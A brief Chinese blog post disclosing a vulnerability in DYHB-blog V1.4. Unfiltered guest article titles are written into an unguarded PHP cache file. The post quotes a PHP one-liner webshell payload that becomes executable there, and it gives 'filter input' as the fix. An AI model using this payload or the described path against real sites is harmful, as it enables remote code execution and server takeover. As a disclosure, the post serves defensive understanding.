DYHB-blog V1.4写马漏洞及修复

刚下载来看一开始就看到。。。  运气真好。。。。
public.php 文件  游客发布文章.....
经典对白看代码 if($view=="save"){ 
         //文章表单数据 
     $title= get_argpost( 'title')  ;
 get_argpost 是获取POST

没有任何的过滤
然后悲剧在
生成缓存文件  生成过程就不看了  
width\cache\c_cms_newlog.php
缓存文件开头没有<? exit();?> 
看第一段内容
a:2:{i:0;a:1:{i:0;a:57:{i:0;s:1:"3";s:7:"blog_id";s:1:"3";i:1;s:24:"<? eval($_POST[xxxx]);?>"
直接XX了........ 作者：心灵

修复：过滤